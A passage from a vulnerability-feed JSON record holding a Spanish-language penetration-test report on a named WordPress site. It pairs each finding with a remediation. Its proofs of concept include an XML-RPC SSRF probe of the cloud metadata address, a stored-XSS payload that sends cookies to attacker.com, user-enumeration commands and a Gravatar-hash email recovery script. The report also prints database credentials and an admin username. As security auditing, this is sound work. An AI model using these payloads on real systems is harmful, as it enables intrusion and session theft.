causa que el servidor realice peticiones HTTP salientes arbitrarias (SSRF). Se confirm\u00f3 que el servidor intenta alcanzar 169.254.169.254 (metadata cloud) y puede escanear puertos internos por diferencia de tiempos.\n        \nPoC\n        \n# SSRF \u2014 servidor hace fetch a URL controlada por atacante\ncurl -X POST https://columtech.online/xmlrpc.php \\\n  -d '<methodCall><methodName>pingback.ping</methodName>\n       <params>\n         <param><value><string>http://169.254.169.254/</string></value></param>\n         <param><value><string>https://columtech.online/?p=1</string></value></param>\n       </params></methodCall>'\n\n# Resultado: 11.3s timeout \u2192 servidor alcanza metadata endpoint\n# Externo (example.com): 1.3s | Interno (localhost:80): 0.3s\n        \nImpacto\n        \n\n          \nSSRF: escaneo de puertos/servicios internos y metadata cloud\n          \nsystem.multicall: amplificaci\u00f3n de credential testing sin generar logs proporcionales\n          \nPingback abuse: DDoS contra terceros usando el servidor como amplificador\n        \n        \nRemediaci\u00f3n\n        \nadd_filter('xmlrpc_enabled', '__return_false');\n# O bloquear en Cloudflare/Caddy si se necesita para Jetpack\n      \n    \n\n    \n    \n\n      \n\n        H-02\n        Alto\n        CVE-2026-6127 \u2014 Elementor 4.0.2 Stored XSS v\u00eda REST API (form-encoded PATCH)\n      \n      \n\n        \nDescripci\u00f3n\n        \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (CVSS 6.4). El campo _elementor_data se registra con show_in_rest sin sanitize_callback. Un atacante con rol Contributor+ puede enviar una petici\u00f3n PATCH form-encoded (no JSON) y la sanitizaci\u00f3n se salta completamente, almacenando JavaScript arbitrario que se ejecuta para cualquier visitante, incluyendo el administrador.\n        \nPoC\n        \ncurl -X PATCH https://columtech.online/index.php?rest_route=/wp/v2/posts/1 \\\n  -H \"Authorization: Basic $(echo -n 'contributor:pass' | base64)\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  --data-urlencode 'meta[_elementor_edit_mode]=builder' \\\n  --data-urlencode 'meta[_elementor_data]=[{\"elType\":\"widget\",\"widgetType\":\"html\",\"settings\":{\"html\":\"<svg/onload=fetch(\\\"//attacker.com/\\\"+document.cookie)>\"}}]'\n        \nImpacto\n        \n\n          \nXSS persistente \u2192 robo de session cookies del administrador\n          \nAccount takeover del administrador cuando visita la p\u00e1gina\n          \nCadena hacia defacing y RCE desde XSS (auto-crear admin v\u00eda fetch)\n        \n        \nRemediaci\u00f3n\n        \n# Actualizar Elementor a \u2265 4.0.5\n# Workaround: restringir rol Contributor a usuarios de confianza\n      \n    \n\n    \n    \n\n      \n\n        H-03\n        Alto\n        Enumeraci\u00f3n de usuarios admin por 4 v\u00edas sin rate-limit\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl username del administrador (marce) se obtiene por al menos 4 m\u00e9todos distintos, ninguno protegido por rate-limit ni captcha:\n        \nPoC\n        \n# M\u00e9todo 1: REST API bypass del filtro de Caddy\ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/users\"\n# [{\"id\":1,\"slug\":\"marce\",...},{\"id\":2,\"slug\":\"prueba\",...}]\n\n# M\u00e9todo 2: author redirect\ncurl -I \"https://columtech.online/?author=1\"\n# 301 \u2192 /author/marce/\n\n# M\u00e9todo 3: wp-login oracle (respuesta diferente seg\u00fan usuario)\n# v\u00e1lido: \"la contrase\u00f1a que has introducido para marce no es correcta\"\n# inv\u00e1lido: \"El nombre de usuario nope123 no est\u00e1 registrado\"\n\n# M\u00e9todo 4: lostpassword oracle\n# v\u00e1lido: \"no se pudo enviar el correo electr\u00f3nico\" (usuario S\u00cd existe)\n# inv\u00e1lido: \"no hay ninguna cuenta con ese nombre de usuario\"\n        \nRemediaci\u00f3n\n        \n# Restringir REST users a autenticados:\nadd_filter('rest_endpoints', function($ep){\n    if(isset($ep['/wp/v2/users'])) unset($ep['/wp/v2/users']);\n    return $ep;\n});\n# Unificar mensajes de error de wp-login y lostpassword\n# Bloquear ?author= redirect\n      \n    \n\n    \n    \n\n      \n\n        H-04\n        Alto\n        Nonce de plugin Filevue expuesto en REST API sin autenticaci\u00f3n\n      \n      \n\n        \nDescripci\u00f3n\n        \nLa p\u00e1gina \u00abClient Portal\u00bb (ID=7) contiene el formulario de login del plugin Filevue con un nonce WordPress (_wpnonce) embebido en el HTML renderizado. Este HTML es devuelto por la REST API GET /wp/v2/pages/7 sin autenticaci\u00f3n, exponiendo el nonce a cualquier atacante.\n        \nPoC\n        \ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/pages/7\" | \\\n  grep -o '_wpnonce\" value=\"[^\"]*\"'\n# _wpnonce\" value=\"ecd04e0712\"\n\n# El nonce permite enviar peticiones autenticadas a admin-post.php\n# sin estar logueado \u2014 usado para probar SQLi en filevue_client_login\n        \nRemediaci\u00f3n\n        \n# No embeber nonces en contenido REST p\u00fablico\n# Restringir /wp/v2/pages a usuarios autenticados o excluir p\u00e1gina Client Portal\n# Generar nonce en el lado cliente (JS) tras autenticaci\u00f3n\n      \n    \n\n    \n    \n\n      \n\n        M-01\n        Medio\n        Versiones desactualizadas \u2014 WordPress 7.0 / Elementor 4.0.2 / Apache 2.4.66\n      \n      \n\n        \nDescripci\u00f3n\n        \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (parcheado en 4.0.5). Apache 2.4.66 es vulnerable a CVE-2026-23918 (RCE HTTP/2) y CVE-2026-24072 (read bypass via htaccess), ambos parcheados en 2.4.67. El meta generator expone versiones exactas.\n        \nRemediaci\u00f3n\n        \n# Actualizar Elementor: wp plugin update elementor\n# Actualizar Apache: apt-get upgrade apache2\n# Eliminar generator meta:\nremove_action('wp_head', 'wp_generator');\n# Eliminar readme.html y license.txt del webroot\n      \n    \n\n    \n    \n\n      \n\n        M-02\n        Medio\n        Email de usuario deducible por reverse Gravatar SHA-256\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas URLs de avatar Gravatar incluyen el hash SHA-256 del email normalizado del usuario. El email de la cuenta prueba (prueba@gmail.com) fue deducido probando candidatos comunes contra el hash expuesto p\u00fablicamente en GET /wp/v2/users/2.\n        \nPoC\n        \nimport hashlib\nhash_target = \"913ef45dd4e1f647359a846bca8bffb8d25b22f2a79d34d71c9c90ef0eb53024\"\nfor email in [\"prueba@gmail.com\", ...]:\n    if hashlib.sha256(email.encode()).hexdigest() == hash_target:\n        print(\"MATCH:\", email)\n# MATCH: prueba@gmail.com\n        \nRemediaci\u00f3n\n        \n# Desactivar Gravatar en WordPress (usar avatar local)\n# O usar un email que no sea predecible para cuentas sensibles\n      \n    \n\n    \n    \n\n      \n\n        M-03\n        Medio\n        Recuperaci\u00f3n de contrase\u00f1a rota + oracle de usuario\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl formulario de recuperaci\u00f3n de contrase\u00f1a falla con el error \u00abno se pudo enviar el correo electr\u00f3nico\u00bb para usuarios v\u00e1lidos, y \u00abno hay ninguna cuenta\u00bb para usuarios inexistentes. Esto act\u00faa como or\u00e1culo de enumeraci\u00f3n. Adem\u00e1s, el correo no se env\u00eda, por lo que el reset es inoperable \u2014 impacto en disponibilidad y posible vector de host-header injection si se configura SMTP en el futuro.\n        \nRemediaci\u00f3n\n        \n# 1. Configurar SMTP (WP Mail SMTP o Mailgun)\n# 2. Unificar mensaje de error (no revelar si usuario existe)\n# 3. Fijar siteurl y home en wp-config.php para prevenir host-header injection\ndefine('WP_SITEURL', 'https://www.columtech.online');\ndefine('WP_HOME', 'https://www.columtech.online');\n      \n    \n\n    \n    \n\n      \n\n        M-04\n        Medio\n        wp-cron.php accesible p\u00fablicamente\n      \n      \n\n        \nDescripci\u00f3n\n        \nwp-cron.php devuelve HTTP 200 y puede ser llamado externamente. Permite amplificar la carga del servidor llam\u00e1ndolo en bucle, actuando como vector de DoS.\n        \nRemediaci\u00f3n\n        \n# En wp-config.php:\ndefine('DISABLE_WP_CRON', true);\n# En crontab del servidor:\n*/5 * * * * curl -s https://www.columtech.online/wp-cron.php?doing_wp_cron=1 >/dev/null\n      \n    \n\n    \n    \n\n      \n\n        L-01\n        Bajo\n        Cabeceras de seguridad HTTP ausentes\n      \n      \n\n        \nDescripci\u00f3n\n        \nFaltan Strict-Transport-Security (HSTS), X-Content-Type-Options: nosniff y Permissions-Policy. La CSP solo cubre frame-ancestors 'self'.\n        \nRemediaci\u00f3n\n        \n# En Caddy (Caddyfile):\nheader Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\nheader X-Content-Type-Options \"nosniff\"\nheader Permissions-Policy \"geolocation=(), microphone=(), camera=()\"\n      \n    \n\n    \n    \n\n      \n\n        L-02\n        Bajo\n        Divulgaci\u00f3n de origen Apache y versi\u00f3n en p\u00e1ginas 404\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas p\u00e1ginas 404 generadas por Apache revelan: Apache/2.4.66 (Debian) Server at www.columtech.online Port 80 \u2014 versi\u00f3n exacta, distribuci\u00f3n y que escucha en puerto 80 sin TLS.\n        \nRemediaci\u00f3n\n        \n# En apache2.conf:\nServerTokens Prod\nServerSignature Off\n      \n    \n\n    \n    \n\n      \n\n        L-03\n        Bajo\n        readme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WordPress\n      \n      \n\n        \nDescripci\u00f3n\n        \n/readme.html devuelve HTTP 200 y revela la versi\u00f3n exacta de WordPress. Facilita targeting con CVEs de versi\u00f3n espec\u00edfica.\n        \nRemediaci\u00f3n\n        \nrm /var/www/html/readme.html /var/www/html/license.txt\n      \n    \n\n    \n    \n\n      \n\n        L-04\n        Bajo\n        CVE-2026-24072 Apache 2.4.66 \u2014 htaccess mod_rewrite file read\n      \n      \n\n        \nDescripci\u00f3n\n        \nApache 2.4.66 es vulnerable a CVE-2026-24072: un usuario con acceso de escritura a .htaccess puede leer ficheros fuera de su directorio con los privilegios del proceso httpd. En este caso, www-data ya tiene ese acceso, pero el vector es relevante en escenarios multiusuario.\n        \nRemediaci\u00f3n\n        \n# Actualizar Apache a 2.4.67+\napt-get upgrade apache2\n      \n    \n\n    \n    \n\n      \n\n        I-01\n        Info\n        Hardening de contenedor Docker \u2014 seccomp + AppArmor + ptrace_scope=3\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl contenedor Docker presenta un perfil de hardening excepcional que bloque\u00f3 todos los CVEs de escalada de privilegios probados (12 t\u00e9cnicas distintas). Los syscalls AF_ALG, CLONE_NEWUSER, io_uring_setup y pidfd_getfd est\u00e1n bloqueados por seccomp. AppArmor docker-default bloquea escrituras a ficheros de sistema. ptrace_scope=3 impide toda inspecci\u00f3n de procesos. Este es el nivel de hardening correcto para workloads en producci\u00f3n.\n        \nCVEs probados y bloqueados\n        \nCVE-2026-31431 (Copy Fail)     \u2192 AF_ALG bloqueado por seccomp\nCVE-2026-43284 (Dirty Frag)    \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46300 (Fragnesia)     \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46333 (ssh-keysign)   \u2192 pidfd_getfd bloqueado\nio_uring exploits              \u2192 io_uring_setup bloqueado\nGameOver(lay)                  \u2192 CLONE_NEWUSER bloqueado\nCrackArmor                     \u2192 AppArmor FS inaccesible en container\nCVE-2026-27456 (mount TOCTOU)  \u2192 Sin /etc/fstab user,loop entries\ngpasswd shadow attack          \u2192 AppArmor bloquea escritura /etc/gshadow\n      \n    \n\n    \n    \n\n      \n\n        I-02\n        Info\n        Credenciales DB en texto claro en variables de entorno del container\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas credenciales de MySQL est\u00e1n accesibles en texto claro v\u00eda /proc/self/environ para cualquier proceso del container (incluyendo www-data tras RCE):\n        \nWORDPRESS_DB_HOST=wordpress_db:3306\nWORDPRESS_DB_USER=wp_user\nWORDPRESS_DB_PASSWORD=wp_password\nWORDPRESS_DB_NAME=wordpress\n        \nRemediaci\u00f3n\n        \n# Usar Docker secrets en lugar de env vars para credenciales\n# O montar fichero de config encriptado desde un secrets manager\n      \n    \n\n    \n    \n\n      \n\n        I-03\n        Info\n        Kernel 6.8.0-117 vulnerable a CVE-2026-46333 (bloqueado por seccomp)\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl kernel 6.8.0-117-generic (compilado el 5 Mayo 2026) es anterior al fix de CVE-2026-46333 (publicado el 14 Mayo 2026). La vulnerabilidad permite leer /etc/shadow mediante una race condition en __ptrace_may_access() + pidfd_getfd. El seccomp del container bloquea el syscall pidfd_getfd (438), mitigando completamente el exploit. Se verific\u00f3 que el exploit p\u00fablico fall\u00f3 con \u00abno hit in 500 rounds\u00bb.\n        \nRemediaci\u00f3n\n        \n# Actualizar el kernel del host cuando est\u00e9 disponible el parche\n# El seccomp profile actual ya protege contra este CVE\n      \n    \n\n  \n\n  \n\n    \nPlan de Remediaci\u00f3n \u00b7 Prioridad\n    \n\n      HOY (cr\u00edtico): Cambiar contrase\u00f1a de marce (m\u00ednimo 20 chars). Eliminar wp-loginizer.php, 2ops.php y todos los ficheros de auditor\u00eda del webroot. Desactivar XML-RPC. Eliminar plugin Code Snippets y el snippet malicioso.\n    \n    \n\n      Esta semana: Actualizar Elementor a \u2265 4.0.5 (parchea CVE-2026-6127). Actualizar Apache a 2.4.67 (parchea CVE-2026-23918 y CVE-2026-24072). Auditar todos los archivos PHP modificados en los \u00faltimos 90 d\u00edas. Configurar SMTP y unificar mensajes de error de wp-login. Restringir REST API users a autenticados. A\u00f1adir cabeceras de seguridad HTTP.\n    \n    \n\n      Este mes: Implementar 2FA para el panel de administraci\u00f3n. Migrar credenciales DB a Docker secrets. Configurar DISABLE_WP_CRON y cron real del sistema. Implementar WAF en Cloudflare para xmlrpc.php y ?author=. Eliminar readme.html y establecer ServerTokens Prod.\n    \n  \n\n  \n\n    \nAnexo \u00b7 Comandos de verificaci\u00f3n post-remediaci\u00f3n\n    \nEjecutar estos comandos tras aplicar las correcciones para confirmar que los vectores est\u00e1n cerrados:\n    \n# C-01: XML-RPC deshabilitado\ncurl -s -X POST https://columtech.online/xmlrpc.php | grep -c \"XML-RPC server accepts\"\n# Esperado: 0\n\n# C-02: Webshells eliminadas\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/wp-loginizer.php\n# Esperado: 404\n\n# H-03: REST users requiere autenticaci\u00f3n\ncurl -s https://columtech.online/index.php?rest_route=/wp/v2/users | jq '.code'\n# Esperado: \"rest_forbidden\"\n\n# H-03: ?author= no revela usuario\ncurl -s -o /dev/null -w \"%{redirect_url}\" \"https://columtech.online/?author=1\"\n# Esperado: vac\u00edo o URL sin slug de usuario\n\n# L-01: HSTS presente\ncurl -sI https://columtech.online/ | grep -i strict-transport\n# Esperado: Strict-Transport-Security: max-age=...\n\n# L-03: readme.html eliminado\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/readme.html\n# Esperado: 404\n  \n\n\n\n\n\n  Auditor\u00eda realizada por c4sh3r \u00b7 Reporte generado el 2026-06-04\n  Todos los hallazgos fueron verificados en entorno real con autorizaci\u00f3n del propietario. Las pruebas de escritura (defacing, webshells) fueron limpiadas inmediatamente tras la verificaci\u00f3n. PII real redactada.\n\n\n\n\n", "creation_timestamp": "2026-06-03T23:46:41.000000Z"}, {"uuid": "2d5b62dc-0a13-44d5-9bac-409d578c0a79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/almalinux.org/post/3mnkyujhurn2z", "content": "Patched kernels for CVE-2026-46333 are now in production repos. \n\nA single dnf upgrade and reboot gets you patched kernels for ssh-keysign-pwn and Fragnesia \ud83d\udc49 https://almalinux.org/blog/2026-05-15-ssh-keysign-pwn-cve-2026-46333/?utm_medium=social&utm_source=bluesky", "creation_timestamp": "2026-06-05T20:43:06.219857Z"}]}